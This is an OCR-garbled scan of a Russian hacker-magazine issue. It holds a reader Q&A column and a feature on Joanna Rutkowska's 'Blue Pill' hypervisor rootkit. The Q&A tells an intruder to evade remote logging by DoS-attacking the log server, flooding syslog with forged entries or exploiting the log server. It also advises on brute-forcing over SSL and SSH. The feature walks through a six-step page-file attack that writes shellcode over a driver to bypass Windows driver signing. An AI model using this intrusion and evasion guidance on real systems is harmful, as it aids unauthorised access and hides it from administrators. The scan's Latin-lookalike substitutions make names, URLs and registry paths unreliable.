( ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/апаІѵ1ісз/21 61 99.рЬр Т 

О: Как проникнуть в систему, в которой 
логи копируются на удаленную маши- 
ну, и при этом не засветиться? 

А: Если есть возможность, на время взломаус- 
трой ЭоЗ против компа, где сохраняются логи. 
Выведенный из строя, он не сможет принимать 
ихсмашины-жертвы. Если логи копируются при 
помощи зузіодб, то ты можешь использовать 
другой способ — «загадить» логи поддельны- 
ми записями с помощью программы ЗѴЗІ_ОС 
Роддег ( ЬДрѴ/раскеІзІогтзесигіІѵ.ога У Ну и, 
наконец, попробуй взломать сам лог-сервер. 
Админы могут не особо следить за обновления- 
ми его ПО, поэтому, возможно, там будет стоять 
какая-нибудь устаревшая хрень, под которую 
сплоиты валяются по всему инету. 
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О: Слышал про какие-то обфускаторы, 
чезахрень? 

А: Английское слово «оЫизсаІе» дословно пе- 
реводится как «запутывать», «озадачивать», 
«сбивать с толку». Обфускация — это запуты- 
вание кода программы, то есть приведение ис- 
ходного текста или исполняемого кода к виду, 
сохраняющему функциональность программы, 
но затрудняющему анализ и модификацию. Об- 
фускацию можно выполнять вручную или дове- 
рять специальным программам — обфускато- 
рам. Обфускация чаще всего выполняется для 
программ, которые распространяются в ис- 
ходных текстах на таких языках, как баѵаЗсгірІ, 
ѴВЗсгірі, РегІ и даже НТМІ_. Язык баѵа и языки 
платформы .ІМЕТ компилируют исходный код в 
промежуточный (байт-код), который содержит 
достаточно информации для восстановле- 
ния исходного кода. Поэтому для этих языков 
также часто применяется обфускация про- 
межуточного кода. Простейший пример об- 
фусцированного НТМІ_: <і>ха</іхі>кер</і>. 
В браузере будет показано слово «хакер», при 
этом в исходном коде его нет. 

Кроме защиты программ от анализа и моди- 
фикации, обфускаторы обычно оптимизиру- 
ют программу по размеру и скорости работы. 
Примеры обфускаторов для баѵа: Ргобиагб 
( ИДр://ргоаиагб.зоигсеІогае.пе1 ) и баѵаСиагсІ 
( ИДр://зоигсеІогае.пе1/ргоіес1з/іаѵааиагб Ѵ 



О: Пишу брутфорсер на Си и хочу в него 
добавить возможность перебора по 
§81. и 55Н, но никакой литературы, объ- 
ясняющей, как это сделать, я не видел. 
Что посоветуешь? 

А: Добавить в программу поддержку протоко- 
лов 53І_ и ЗЗН совсем несложно. Обычно для 
этого используются сторонние библиотеки, 
например ОрепЗЗЬ ( ѵѵѵѵѵѵ.орепззі.ога ) и ІіЬззИ 
( ИДр://0хЬабс0бе.Ье/ІіЬззІі/ІіЬззИ-0.1 1 Даг ). 

В архивах с библиотеками в обязательном по- 
рядке идут инструкции для программиста (на 
английском языке), объясняющие, как подклю- 
чать и использовать библиотеки в программах. 
Нескольких вызовов библиотечных функций 
достаточно, чтобы твоя программа задейство- 
вала всю мощь этих протоколов. В моей книге 
«Программирование боевого софта под І_іпих» 
ты сможешь найти более подробную ин- 
формацию по этому вопросу с реальными 
примерами кода. 




О: Что такое таіѵѵаге? 

А: Термин «таіѵѵаге» является сокращением 
от слов Маіісіоиз ЗоІІѵѵаге, что переводится 
как «злонамеренное программное обеспече- 
ние». Под таіѵѵаге понимают вирусы, черви, 
трояны, руткиты, кейлогеры и другой хакерс- 
кий стаф, который нарушает нормальную ра- 
боту компьютера. 



О: Нужно ли в наше время хакеру изу- 
чать РегІ? 

А: Если речь идет о настоящем хакере, то он 
должен изучать все, что касается компьютер- 
ных и сетевых технологий, тем более — такой 
известный язык, как РегІ. Другое дело, в каком 
порядке это все нужно изучать. Сначала реши 
для себя, зачем тебе нужен РегІ? Если ты со- 
бираешься заниматься взломами сайтов и 
дефейсами, то, разумеется, учи РегІ в первую 
очередь. Правда, в наше время РегІ сильно по- 
теснили такие ѵѵеЬ-языки, какРНРиАЗР, новее 
равно он еще активно используется в ѵѵеЬ. 
Если же ты собираешься заниматься более се- 
рьезными вещами, например созданием экс- 
плоитов, то выучи сначала Си и Ассемблер. 

В любом случае, я бы советовал рано или поз- 
дно познакомиться с РегІ, так как это универ- 
сальный язык, который может использоваться 
в качестве как ѵѵеЬ-, так и простого скриптового 
языка для решения каких-то системных задач в 
ІІІМІХ и ѴѴіпбоѵѵз. 

О: Как в ѴѴіпсІоѵѵз ХР можно посмот- 
реть открытые порты, открытые фай- 
лы, кто и какие процессы запустил, 
и т.д. Короче, как провести полный 
аудит системы на наличие троя- 
нов и прочих незваных гостей? 

А: Я расскажу только о стандартных средс- 
твах командной строки ХР. С помощью утили- 
ты пеізіаі можно получить информацию об от- 
крытых портах и установленных соединениях. 
Ключ /а показывает все активные порты и пор- 
ты, находящиеся в режиме прослушивания. 
Ключ /о показывает РЮ процессов, открыв- 
ших порты ТСР или ІЮР. Ключ /п отображает 
адреса и номера портов в числовом формате. 
Утилита іазкіізі показывает запущенные в сис- 
теме процессы и их РЮ. Ключ /т показывает 
ОІ_І_, загруженные каждым процессом. Ключ 
/зѵс отображает службы для каждого процес- 
са. Ключ /ѵ показывает подробные листинги с 
полезной информацией. Утилита ІазккіІІ поз- 
воляет уничтожать процессы. Утилита дѵѵіпзіа 



показывает список пользователей, зарегис- 
трированных в ХР. Утилита цргосезз показы- 
вает список процессов, запущенных каждым 
зарегистрированным пользователем. Утлита 
орепТИез показываетфайлы, открытые с общих 
сетевых ресурсов. Ключ /сіізсоппесі: позволяет 
закрывать файлы, открытые как удаленными, 
так и локальными пользователями. Утилита 
зузіетіпіо показывает сведения о конфигура- 
ции системы. Ключ /з позволяет получать ин- 
формацию об удаленных машинах. 



О: Была ли когда-нибудь в мире ІШІХ 
вирусная эпидемия? 

А: Нет, вирусной эпидемии в мире ІІІМІХ не было 
ни разу и не будет, хотя ІІІМІХ-вирусов существу- 
ет немало. А вот эпидемии, вызванные сетевы- 
ми червями, в мире ІІІМІХ были и не раз. Самые 
известные ІІІМІХ-черви, вызвавшие эпидемию, 
— червь Морриса младшего, Ратеп, І_іоп, 
СИеезе, Забтіпб, Абоге. Уже предвижу твой 
следующий вопрос: «Почему не было вирусной 
эпидемии?» Посуди сам. Системы ІІІМІХ имеют 
очень грамотную систему разграничения прав 
доступа, поэтому, для того чтобы заразить всю 
систему, вирусу нужно иметь правасистемного 
администратора (гооі в І_іпих). Если инфектор 
совместить с эксплоитом, эксплуатирующим 
какую-нибудь локальную уязвимость, прису- 
щую сразу многим ІІІМІХ-системам, то можно 
получить полноценный вирус, способный за- 
разить всю систему. Но даже в этом случае 
вызвать серьезную эпидемию невозможно, так 
как для распространения вируса нужно, чтобы 
большое число людей переписало заражен- 
ный файл к себе на компьютер и запустило его. 
Времена, когда люди обменивались дискетами 
с интересными программами, давно прошли. 
Сейчас администраторы ІІІМІХ-систем скачива- 
ют программы преимущественно из надежных 
интернет-источников, к тому же — в исходных 
кодах. Поэтому говорить о вирусной эпидемии 
в мире ІІІМІХ не приходится, т 
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> «Проглотив» Голубую Пилюлю опе- 
рационная система проваливается в 
виртуальный мир 



>«Приняв» Красную Пилюлю, операци- 
онная система обнаруживает эмулятор 
(если он есть) 






НЕ УСПЕЛА ѴѴШБ0ѴѴ5 ѴІ5ТА ПОСТУПИТЬ В ПРОДАЖУ, КАК БЫЛА ЗВЕРКИ ВЗЛОМАНА ПОЛЬСКОЙ ПАНИ ЖАННОЙ РУТКОВСКОЙ 
ЦІОАІЧЫА РЫТК0ѴѴ5КА). НА КОНФЕРЕНЦИИ 5Ѵ5САІЧ В СИНГАПУРЕ 21 ИЮЛЯ ОНА ПРОДЕМОНСТРИРОВАЛА РЕЗУЛЬТАТ СВОЕГО 
ВЗЛОМА - РУТКИТ НОВОГО ПОКОЛЕНИЯ, КОТОРЫЙ ПРАКТИЧЕСКИ НЕВОЗМОЖНО ОБНАРУЖИТЬ, А ТЕМ БОЛ ЕЕ УДАЛ ИТЬ. НОВАЯ 
ТЕХНОЛОГИЯ ПОЛУЧИЛА НАЗВАНИЕ ВШЕ РІІ_І_ - ГОЛУБАЯ ПИЛЮЛЯ. 



еакция представителей Місго- 
зоЛ оказалась на удивление 
спокойной. Подумаешь, под- 
ломали бету! Никто же и не ут- 
верждал, что взломать Висту невозможно! 
Идет нормальный процесс «обкатки» сис- 
темы, и чем больше ошибок будет выявлено 
на стадии бета-тестирования, тем меньше 
их окажется в финальной версии продукта. 
Однако Ѵізіа ВС1 , выпущенная двумя меся- 
цами позже, не претерпела никаких изме- 
нений и осталась по-прежнему уязвимой. 
МісгозоЛ проанализировала ситуацию и, 
вместо того чтобы заткнуть дыру, сделала 
вид, что никакой дыры нет (смотри выступ- 
ление одного из сотрудников МісгозоЛ: 
ИПрѴ/ЬІоаз.тзбп.сот/ѵѵіпбоѵѵзѵізіазесигіІу/ 
агсИіѵе/2006/08/07/691441.азрх ')! 

Мол, с правами администратора (а Голубая 
Пилюля требует их) еще и не такое возмож- 
но! А что, собственно говоря, с ними возмож- 
но?! Загрузить неподписанный драйвер или 
каким бы то ни было другим легальным спо- 
собом проникнуть науровень ядра? Нельзя, 
и это доставляет множество проблем как 
самим администраторам, так и разработчи- 
кам. Если бы МісгозоЙ заткнула все лазейки, 
во имя ее величества Безопасности с этим 
можно было бы и смириться. Атак получа- 
ется, что нас вынуждают поступиться час- 
тью свобод и удобств, предлагая взамен... 
ничего! Где логика?! Как всегда логика на 
стороне Місгозоф преуспевшей только в 
одном — в продвижении своих глюкодромов 
нарынок. 

Голубая Пилюля базируется на двух ос- 
новных концепциях — обходе цифро- 
вой подписи драйверов (обязательной в 
х86-64-редакциях ѴѴіпсІоѵѵз, начиная с Ѵізіа 
Веіа 2 ЬиіІсІ 5384) и установке гипервизора 
фурег-ѵізог), использующего технологии 
аппаратной виртуализации АІѴЮ РасіЯса/ 
ІпіеІ ѴапсІегрооІ. Эти технологии позволяют 
запускать операционную систему на эму- 
ляторе, контролирующем все интересные 
события. В грубом приближении это можно 
проиллюстрировать на примере 80836 ЦП, 



поддерживающего режим «виртуального 
8086» (он же Ѵ86), который обеспечивает 
одновременную работу нескольких сессий 
МЗ-ЭОЗ. А теперь появился режим «вирту- 
ального 386+», причем правильно спроекти- 
рованный гипервизор (также называемый 
Монитором Виртуальных Машин — ѴігІиаІ 
МасМпе Мопііог, ѴММ) не позволяет госте- 
вой системе определить, исполняется ли 
она на «живом» процессоре или нет. 
Технология обхода цифровой подписи 
драйверов актуальна только для 64-бит- 
ных версий ѴѴіпсІоѵѵз (в 32-битных загру- 
зить неподписанный драйвер можно и 
так), а механизмы аппаратной виртуализа- 
ции никак не связаны с конкретной осью 
и замечательно работают на Ьіпих, ВЗЭ, 
Мае ОЗ и т. д. (разумеется, при поддержке со 
стороны процессора). Любая ось, позволя- 
ющая хакеру пробиться науровень ядра, мо- 
жетбыть атакована. Таким образом, Голубая 
Пилюля состоит из двух компонентов, лишь 
один из которых по-настоящему «голубой». 
Он-то и отвечает за погружение операци- 
онной системы в виртуальный мир. Другой 
компонент — независимая «затравка», 
специально спроектированная для обхода 
защиты 64-битных версий ѴѴіпсІоѵѵз. Она за- 
брасывает (точнее, сбрасывает) наядерный 
уровень любую полезную нагрузку, в роли 
которой вполне может выступать и обычный 
гооікіг 

□ Обход цифровой подписи 

Механизм обхода цифровой подписи, пред- 
ложенный Жанной, основан на модифика- 
ции файла подкачки на секторном уровне 
(назовем его раде ТМе аиаск). Сама атака 
состоит из шести этапов: 

1. Находим в катал оге/ѴѴІ[\І[\ІТ/Зузіет32/ 
Эгіѵез редко используемый драйвер (напри- 
мер: ШЬЬ.ЗѴЗ), считываем его содержимое 
и выделяем уникальную последователь- 
ность байт (сигнатуру), позволяющую одно- 
значно идентифицировать его. Сигнатура 
должна находиться в ветке ІРР_М^ЭЕѴІСЕ_ 
СОЫТРОЬ процедуры ЭеѵісеЭізраісІ'іег 



(адрес последней легко определить путем 
дизассемблирования драйвера), причем 
она не имеет права пересекать границы 
страницы (в файле подкачки соседние стра- 
ницы не всегда оказываются рядом друг с 
другом). То есть должно выполняться усло- 
вие: (ѵИиаІ_асІсІгезз_о{_зідпа{иге % 10001т) + 
зІ2еоЦѵИиаІ_асІсІгезз_о{_5ідпа{иге) < 1000И. 

2. Запускаем программу тетогу-еаіег, 
«съедающую» всю доступную память (напри- 
мер путем вызова АРІ-функции ѴИиаІАІІос) 
и вынуждающую операционную систему 
свопиться на диск, вытесняя в том числе 
и ядерные компоненты. Внимание! Если 
параметр ЭізаЫеРадіпдЕхесиііѵе, находя- 
щийся в следующей ветке реестра НКІ_М\ 
ЗУЗТЕМХСиггепіСопігоІЗеАСопігоІХЗеззіоп 
МападегХМетогуМападетепі, равен 1 (по 
умолчанию — 0), ядерные компоненты вы- 
тесняться не будут! Изменения вступают в 
силу только после перезагрузки. 

3. Открываем устройство \\.\С: (логический 
диск) или\\.\РНѴЗІСАІ_ЭВІѴЕ0» (физический 
диск) АРІ-функцией СгеаіеРіІе и читаем/пи- 
шем на секторном уровне АРІ-функциями 
ВеасІРіІе/ѴѴпіеРіІе соответственно. Также 
можно воспользоваться хорошо докумен- 
тированным интерфейсом ЗРТІ, позволяю- 
щим передавать диску ЗСЗІ-команды через 
АРІ-функцию ЭеѵісеІоСопігоІ, за что отве- 
чает ЮСТЬ-код ІОСТІ__ЗСЗІ_РАЗЗ_ТНРО- 
Ы<ЗН_ЭІЯЕСТ (4Э014ІТ). Ось автомати- 
чески транслирует команды рзеисІо-ЗСЗІ в 
паііѵе-команды конкретного накопителя (на- 
пример: ЮЕ НЭЭ). Два недокументирован- 
ныхІОСТЬ-кодаІОСТЬ_ЮЕ_РАЗЗ_ТНВОЫОН 
и ЗСЗІОР_АТА_РАЗЗТНВОЫОН позволя- 
ют передать ЮЕ-накопителям команды 
паііѵе-АТА, что дает над ними неограничен- 
ную власть, ноухудшаетсовместимость(что 
если у жертвы установлен ЗСЗІ-диск?). Все 
вышеупомянутые интерфейсы требуют ад- 
министраторских прав, которые не всегда у 
нас есть. Но АЗРІ-интерфейс, разработан- 
ный компанией Абаріес, не отягощен такими 
ограничениями! И хотя корректно установ- 
ленный АЗРІ-драйвер (кстати говоря, ис- 
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Упрощенная блок-схема Голубой Пилю- 



ли, разработанная Жанной 





ключенный из штатной поставки ѴѴіпсІоѵѵз 
много лет назад) дает доступ только к АТАРІ- 
устройствам (таким как СО, 0\Ю), достаточ- 
но часто в этот список попадают и жесткие 
диски, то есть атаку (теоретически) можно 
реализовать даже без администраторс- 
ких прав! Если АЗРІ-драйвер на целевой 
машине не установлен, гооікіі должен либо 
установить его самостоятельно (кстати, сам 
драйвер подписан и предоставляется бес- 
платно), либо поискать другие драйверы, 
установленные приложениями, работаю- 
щими с РЮО-, СО- или ОѴО-дисками на низ- 
ком уровне (дисковые редакторы, копиров- 
щики защищенных дисков, программы для 
прожига СО/ОѴО). Многие из них позволяют 
манипулировать жесткими дисками, не тре- 
буя прав администратора (подробнее обо 
всем этом можно прочитать в моей книге 
«Техника защиты лазерных дисков от копи- 
рования», черновая версия которой нахо- 
дится наІІрѴ/пегиті.огд.ги). 

4 . Дожидаемся выгрузки драйверанадиск. 
Момент выгрузки легко определить эврис- 
тическим путем. При исчерпании оператив- 
ной памяти система вытеснит часть только 
что выделенных ѴігіиаІАІІос страниц, скачко- 
образно увеличивая количество доступной 
физической памяти, объем которой легко 
установить АРІ-функцией ѴИиаЮиегу. За- 
тем начинаем прочесывать диск на сектор- 
ном уровне в поисках ранее обозначенной 
сигнатуры драйвера-жертвы. 

5 . Вычисляем адрес ІЯР_М^ОЕѴІСЕ_ 
СОИТНОІ. и записываем поверх него 
зГіеІІ-код, отключающий проверку цифровой 
подписи, что в дальнейшем позволитнам бес- 
препятственно загружать неподписанные 
драйверы, либо загружаем весь необходи- 
мый код на ядерный уровень самостоятельно. 



6 Вызываем АРІ-функцию СгеаіеРіІе, пере- 
давая ей имя хакнутого драйвера (в данном 
случае І\ІІ)І_І_.5ѴЗ), и... операционная сис- 
тема тут же считывает модифицирован- 
ные страницы с диска, вызывает ІПР_М4_ 
□ЕѴІСЕ_СОІ\ІТРОІ_, передавая збеІІ-коду 
управление. А дальше, как говорится, дело 
техники! 

Успешно осуществив атаку, Жанна (как и 
положено «белому» хакеру) тут же пред- 
ложила несколько контрмер. Самое про- 
стое, но не самое умное, что может сделать 
МісгозоЙ, — это заблокировать выгрузку 
ядерных компонентов на диск. Все необ- 
ходимые ингредиенты у нее уже есть, до- 
статочно только убрать из реестра ключ 
ОізаЫеРадіпдЕхесиііѵе, пожизненно ус- 
тановив его значение — «1». В результате 
мы потеряем некоторое количество физи- 
ческой памяти (по подсчетам Жанны, около 
80 Мб, а по моим подсчетам, даже меньше). 
К примеру, совокупный объем драйверов 
намоей машине составляетЗО Мб, и я не ду- 
маю, что на висте их размер сильно больше, 
гарантируя при этом, что никакой драйвер 
не будет скомпрометирован. Если учесть, 
что сама виста требует не менее 1 Гб РАМ 
(а для реальной работы понадобится как 
минимум 2), потеря 30 — 80 Мб вряд ли по- 
кажется значительной. Однако можно пой- 
ти другим путем, подсчитывая контрольную 
сумму каждой страницы перед вытеснени- 
ем ее на диск и проверяя ее при загрузке. 
Но поскольку контрольные суммы надо 
где-то хранить (причем не на диске, а в не- 
вытесняемой оперативной памяти), мы не 
получим никакого выигрыша, впустую рас- 
ходуя процессорное время. Можно, конеч- 
но, шифровать страницы каким-нибудь вы- 
сокоскоростным криптоалгоритом, храня в 



памяти всего лишь ключ, случайным обра- 
зом генерируемый при загрузке, но это уже 
чересчур. К тому же существует возмож- 
ность модификации самого файла ядра 
операционной системы, отключающей все 
защитные механизмы и тут же инициирую- 
щей перезагрузку, против которой предло- 
женные защитные меры бессильны! 

Атака на файл подкачки — это действи- 
тельно прорыв, который МісгозоЙ закро- 
ет не скоро (во всяком случае, в Ѵізіа РС1 
еще не закрыла). Важно отметить, что все 
вышесказанное относится исключительно 
к 64-битной версии ѴѴіпсІоѵѵз, поскольку 
только в ней администраторы лишены прав 
загружать неподписанные драйверы. 

□ Погружение в виртуальный мир 

Механизмы аппаратной виртуализации (из- 
вестные под кодовым именем РасіЯса) реа- 
лизованы во всех процессорах семейства 
АіИІоп 64/Тигіоп 64, выпущенных фирмой 
АМО после мая 2006 года. Также планиру- 
ется поддержка виртуализации в Оріегоп'е. 
Но это все платформы х86-64, которые нам 
не сильно интересны, поскольку их рыноч- 
ная доля крайне мала. АМО не смогла спра- 
виться с виртуализацией х86, сославшись 
на сложность реализации и непригодность 
этой архитектуры для подобных целей (чи- 
тай: кишка тонка), а вот Іпіеі смогла, за что 
ей честь и хвала! 

Технология с кодовым именем ѴапбегрооІ 
воплощена в процессорах ІпіеІ Репііит 
46x2, РепЯит О 9хх, Хеоп 7ххх, Соге Оио, 
Соге 2 Оио, куда она перекочевала из 
|{апіит'а (ІА64), где была известна под име- 
нем Зііѵегѵаіе. Теперь во избежание пута- 
ницы она объединена с последней в обез- 
личивающую официальную аббревиатуру 
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ѴТ-Х (ѴИиаІігаЯоп ТесНпоІоду Х-Х-Техно- 
логия Виртуализации). ѴТ-Х существенно 
отличается от РасіТіс'и , но по сути предо- 
ставляет те же самые возможности, а имен- 
но: запуск гипервизора, захватывающего 
контроль над операционной системой и пе- 
реводящего ее в «гостевой» виртуальный 
режим, который, с ее точки зрения, ничем 
не отличается от «реального». 

Гипервизор (в случае ѴТ-Х называемый 
Монитором Виртуальных Машин — ѴігіиаІ 
МасИіпе Мопііог, ѴММ) передает госте- 
вой операционной системе управление 
и получает его назад при наступлении 
определенных «интересных» событий: 
возбуждении аппаратного/программного 
прерывания, обращении к служебным ре- 
гистрам процессора и т.д. Гипервизор не 
может непосредственно перехватывать 
АРІ-функции гостевой операционной сис- 
темы, но способен следить за обращениями 
к портам ввода-вывода или самостоятельно 
взаимодействовать с оборудованием в об- 
ход оси. Косвенный перехват АРІ-функций 
осуществляется путем установки аппарат- 
ных точек останова на исполнение (которых, 
увы, всего 4) с последующим пресечением 
попыток гостевой системы «подсмотреть» 
истинное содержимое регистров ОРх. 
Подробное описание технологии РасіЯса 
содержится в техническом руководстве 
«АІѴЮ64 АгсНііесіиге Ргодгаттег'з МапиаІ 
ѴоІ. 2: Зузіет Ргодгаттіпд», доступном на 
ИДрѴ/ѵѵѵѵѵѵ.атб.сот/из-еп/аззеіз/сопіепЩ 
іуре/\л/Ігі{е_рарегз_апсНесІі_сІосз/24593. рсІТ. 
В отличие от АІѴЮ, Іпіеі не стала валить все 
в одну большую кучу и выпустила отдельный 
документ: Іф://сІоѵѵпІоасІ.ітеІ.сотЛесІтпоІоаѵ/ 
сотриЯпа/ѵр1есІт/С97063-002.рсІГ И хотя 
без руководства по системному програм- 



мированию при написании собственного 
Монитора Виртуальных Машин все равно 
не обойтись, его основные положения боль- 
шинству хакеров уже известны. Конечно, 
для тех, кто еще не знаком с защищенным 
режимом, создание Голубой Пилюли ока- 
жется настоящим испытанием, но... это уже 
их проблемы. 

Рассмотрим устройство Голубой Пилю- 
ли, заточенной Жанной специально под 
процессоры АМО х86-64 (на процессорах 
ІпіеІ все будет точно так же, только немного 
по-другому). «Проглотив» Голубую Пилюлю 
(САП ЫиеріІІ), ядро передает управление 
главной функции гооікіі'а (условно обозна- 
ченной РРОС ЫиеріІІ), которая создаетвир- 
туальную машину. Затем Пилюля подготав- 
ливает все необходимые структуры данных 
и вызывает машинную команду ѴМПІІМ (на 
ІпіеІ процессорах это будет ѴМХОІМ), уста- 
навливающую гипервизор/ѴММ, который 
погружает операционную систему в вирту- 
альный мир и «одевает на ее глаза очки». 
После этого следует перехват всех каналов 
взаимодействия последней с «внешним 
миром»: с портами ввода-вывода, служеб- 
ными регистрами процессора, физической 
оперативной памятью и т. д. Гипервизор бу- 
дет «подсовывать» операционной системе 
только ту информацию, которую ей позво- 
лено видеть, надежно скрывая от ее глаз 
свое присутствие. 

Гипервизор/ѴММ представляет собой до- 
статочно сложную программу, которую 
не так-то просто написать и еще сложнее 
отладить, но ведь нам так хочется реализо- 
вать свою собственную Голубую Пилюлю, 
не правда ли? Сама Жанна, кстати, так и не 
справилась с этой задачей, о чем открыто 
признается в своем блоге в заметке «Тбе ВІие 



РіІІ Нуре» («Слухи вокруг Голубой Пилюли») 
на 1ІтеіпѵізіЫе1Ітіпаз.Ыоазро1.сот/2006/07/ 
Ыие-ріІІ-Ігѵре.ІтітІ . Вот фрагмент из этой 
заметки в переводе: «Все началось со ста- 
тьи Нарьяна Рьяна из еѴѴеек. Статья вполне 
адекватная, за исключением одной малень- 
кой детали, вводящей читателей в заблуж- 
дение. В статье утверждается, что я уже 
реализовала «прототип Голубой Пилюли, 
создающий на 100% не обнаруживаемую 
мальварь», что неправда. Если бы это было 
правдой, я бы не стала называть свою реа- 
лизацию «прототипом», подразумевающим 
наличие опытного продукта... Прототип Го- 
лубой Пилюли, имеющийся у меня в настоя- 
щий момент, еще не полностью реализован, 
но это неважно, поскольку создание вирту- 
альной машины для запуска операционной 
системы и реализация всех остальных фич 
— это всего лишь вопрос следования спе- 
цификациям на РасіЯс'у». 

Чтобы приблизить себя к цели на несколько 
световых лет и не повторять уже сделанное, 
мы можем «выдрать» ядро из готового эму- 
лятора и слегка доработать его «напильни- 
ком» для наших хакерских нужд, дописав 
сравнительно небольшую порцию кода. Ес- 
тественно, это должен быть эмулятор, рас- 
пространяющийся в открытых исходных 
текстах на бесплатной основе. Например, 
ХЕІ\І, поддерживающий обе архитектуры 
(РасіЯса и ѴапбегрооІ одновременно) и 
абстрагирующий нас от конкретных аппа- 
ратных особенностей, хотя и не избавляю- 
щий нас от необходимости реализовывать 
отдельные версии гооІкіГа для х86- и х86-64 
-платформ. Архив с исходными текстами 
третьей версииХЕІ\]'а(текущей стабильной 
версии на данный момент) можно слить с 
ИДрѴ/ѵѵѵѵѵѵ.сІ.сат.ас.ик/РезеагсІт/ЗРѲ/пеІоз/ 
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> Выполнение машинной команды 
ѴМВІІМ на процессорах АМй х86-64 
приводит кзахвату контроля над опера- 
ционной системой 





хеп/боѵѵпІоабз/хеп-З.О-ІезІіпа-згс.Іаг . а сам 
сайт находится по адресу: НЦр://ѵѵѵѵѵѵ.сІ.сат. 
ас.ик/РезеагсІп/ЗРСі/пеіоз/хеп. 

В частности, ядро, отвечающее за подде- 
ржкух86-процессоровІпіеІ, сосредоточено 
в файле /хеп-3.0-іезііпд/хеп/іпсІисІе/а5пп-х86/ 
Нѵт/ѵтх/ѵтх.с. 

О Красная Пилюля 

В «Матрице», чтобы увидеть реальный мир, 
было достаточно принять красную пилю- 
лю. А как на счет операционной системы? 
Может ли она каким-нибудь образом оп- 
ределить, что работает под виртуальным 
эмулятором? Программу, позволяющую 
обнаружить присутствие эмулятора, обыч- 
но называют Красной Пилюлей, и такие пи- 
люли находят самое широкое применение 
как в хакерской, так и администраторской 
среде (первые используют их для детекти- 
рования ѴМѴѴаге или других программных 
эмуляторов, вторые — для обнаружения 
гооікіі'ов). С аппаратной виртуализацией 
все намного сложнее. . . 

Первое, что приходит на ум, — попытаться 
вызвать ѴМСАи_/ѴМХОІЧ и, если мы нахо- 
димся под эмулятором (процессор не под- 
держивает аппаратную виртуализацию, 
или она отключена в ВІОЗ), вызов провали- 
вается. Написать такую программу — пле- 
вое дело. Имея готовый скелет драйвера, 
это можно сделать меньше чем за минуту, 
воттолько как отличить ситуацию «процес- 
сор не поддерживает» от «мы под эмулято- 
ром»? Существует лишь один путь — отод- 
рать от кремния радиатор и физически 



посмотреть на его маркировку, сличив ее с 
«показаниями» машинной команды СРІІЮ. 
Эмулятор, если только он не лось, возвра- 
тит подложные данные, убеждая нас в том, 
что поддержка аппаратной виртуализации 
на этом процессоре отсутствует. Но какой 
процент пользователей отважится на столь 
радикальный шаг?! Отодрать радиатор 
они, положим, отдерут, но вот приставят ли 
обратно :)?Тем более что путем некоторых 
ухищрений гипервизор может эмулиро- 
вать выполнение команд ѴМСАІ_І_/ѴМХО[\І, 
реализуя вложенную виртуализацию. Это 
как бы один виртуальный мир в другом, 
и уровень вложенности, в принципе, не- 
ограничен. Естественно, с каждой «про- 
глоченной» Голубой Пилюлей мы будем 
терять производительность. Уже в первом 
виртуальном мире быстродействие опера- 
ционной системы сокращается на десятки 
процентов (никто никогда и не утверж- 
дал, что аппаратная виртуализация дает 
100% КПД). 

Стоп! Стоп! Стоп! Производительность! Вот 
она, нить Ариадны! Замеряя время выполне- 
ния машинных инструкций, перехваченных 
гипервизором (и в первую очередь инструк- 
ции РЮМЗЯ ЕГЕР, читающей регистр ЕГЕР, 
12-бит которого указывает на присутствие 
гипервизора), мы легко заметим, что в вир- 
туальном мире они выполняются намного 
дольше, чем в реальном. 

Вся проблема в том, что нам нечем измерять 
время их исполнения. Команда РЮТЗС (чи- 
тающая значение регистра, увеличивающе- 
гося с каждым тактом процессора) отпадает 



сразу и однозначно, поскольку контролиру- 
ется гипервизором, который корректирует 
ее показания так, как будто бы мы находимся 
в реальном мире. Для упрощения решения 
этой задачи процессор поддерживает спе- 
циальную «калибровочную» переменную 
ѴМСВ.ТЗС_ОРРЗЕТ, указывающую, сколько 
экстратактов ему следует вычитать при вы- 
полнении команды РЭТЗС. Так что корректи- 
ровка показаний РЭТЗС происходит автома- 
тически даже без вмешательства эмулятора. 
Теоретически можно воспользоваться 
часами реального времени, атомными ча- 
сами, доступными через Сеть, или даже 
внешним по отношению к компьютеру хро- 
нометром. Гипервизор способен «подкру- 
чивать» часы реального времени (правда, 
при этом они начнут отставать, что пользо- 
ватель сможет заметить), перехватывать 
и корректировать сетевой трафик, если в 
нем присутствует атомное время (хм, а не 
надорвется он это делать?). Но на хроно- 
метр, сжимаемый ладонью пользователя, 
он воздействовать не в состоянии, если, 
конечно, пользователь сам не находится в 
виртуальном мире ;-). 

Отличная Красная Пилюля получилась, 
нечего сказать... «Сейчас будет запущена 
тестовая программа. Пожалуйста, восполь- 
зуйтесь своими электронными часами и оп- 
ределите время ее выполнения. Для умень- 
шения погрешности продолжительность 
теста составит около 60 секунд». Ну и кто 
это будет делать? А с чем сравнивать по- 
лученные показания мы подумали? Чтобы 
обнаружить присутствие гипервизора, не- 
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>Технология аппаратной виртуализа- 
ции Расіічса, реализованная в процес- 
сорах фирмы АМй: при выполнении 
машинной команды ѴМРІІМ, процессор 
создает новую 5ѴМ (Защищенную 
Виртуальную Машину), управляемую 
гипервизором и структурой данных 
под названием Ѵігіиаі Метогу Сопігоі 
Віоск (БлокУправления Виртуальной 
Памятью) 








» 




>Два компонента Голубой 
Пилюли — один пробивается на 
уровень ядра, другой погружает 
ось в виртуальный мир 



обходимо иметь эталонный компьютер с та- 
ким же точно процессором, погруженным в 
термостат, поскольку многие процессоры 
меняют свою тактовую частоту в зависи- 
мости от температуры. Но даже в этом слу- 
чае гипервизор может распознать команду 
РЮМ5П ЕГЕР, выполняющуюся в цикле, и 
пропускать некоторые итерации для дости- 
жения идентичного времени выполнения. 
Некоторые горячие головы предлагают чи- 
тать содержимое оперативной памяти через 
ОМА, записывая ее на диск, а потом искать 
в этой куче следы присутствия гипервизора. 
Ну, во-первых, они очень сильно переоце- 
нивают возможности контроллеров ОМА по 
чтению памяти, во-вторых, гипервизор, конт- 
ролируя обращения к портам ввода-вывода, 
легко это отследит, а в-третьих, даже если и 
не отследит, что искать-то? При условии, что 
сигнатура Голубой Пилюли неизвестна (или 
она построена на полиморфной основе), мы 
ни за что не обнаружим ее! 

О Вместо заключения 

Так что же, выходит, Красной Пилюли не су- 
ществует? А это еще как сказать... Ведь и 
Голубой Пилюли тоже не существует. Во вся- 
ком случае, пока. Да, технологии аппаратной 
виртуализации позволяют создать Голубую 
Пилюлю, которую никак нельзя обнаружить. 
Теоретически. Практически жевсеупирает- 
ся в сложность реализации, так что не стоит 
обсуждать конструкцию сферических ко- 
ней в вакууме, а лучше решать проблемы по 
мере их поступления. ЗС 
